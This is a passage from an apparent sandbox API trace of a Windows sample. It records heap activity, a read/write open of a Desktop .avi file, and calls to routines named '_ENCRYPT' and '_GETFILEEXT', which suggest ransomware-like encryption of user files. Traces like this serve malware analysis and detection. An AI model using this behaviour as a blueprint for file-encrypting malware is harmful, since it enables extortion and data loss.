halpmcxz\\desktop\\ymgnx tetw q8bint2j.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7c) returned 0x7d5b30 [0032.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=62, lpWideCharStr=0x7d5b30, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yMGnX teTW q8biNT2J.avi") returned 62 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.362] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.364] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0032.364] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.365] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.366] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0032.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.366] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.366] CloseHandle (hObject=0x128) returned 1 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.367] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.367] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.367] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.367] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.367] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.367] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.367] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.368] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yMGnX teTW q8biNT2J.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f229230, ftCreationTime.dwHighDateTime=0x1d5c271, ftLastAccessTime.dwLowDateTime=0x61c07740, ftLastAccessTime.dwHighDateTime=0x1d5ba49, ftLastWriteTime.dwLowDateTime=0x61c07740, ftLastWriteTime.dwHighDateTime=0x1d5ba49, nFileSizeHigh=0x0, nFileSizeLow=0x4c6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yMGnX teTW q8biNT2J.avi", cAlternateFileName="YMGNXT~1.AVI")) returned 0x7c20c0 [0032.368] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.368] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yMGnX teTW q8biNT2J.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f229230, ftCreationTime.dwHighDateTime=0x1d5c271, ftLastAccessTime.dwLowDateTime=0x61c07740, ftLastAccessTime.dwHighDateTime=0x1d5ba49, ftLastWriteTime.dwLowDateTime=0x61c07740, ftLastWriteTime.dwHighDateTime=0x1d5ba49, nFileSizeHigh=0x0, nFileSizeLow=0x4c6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yMGnX teTW q8biNT2J.avi", 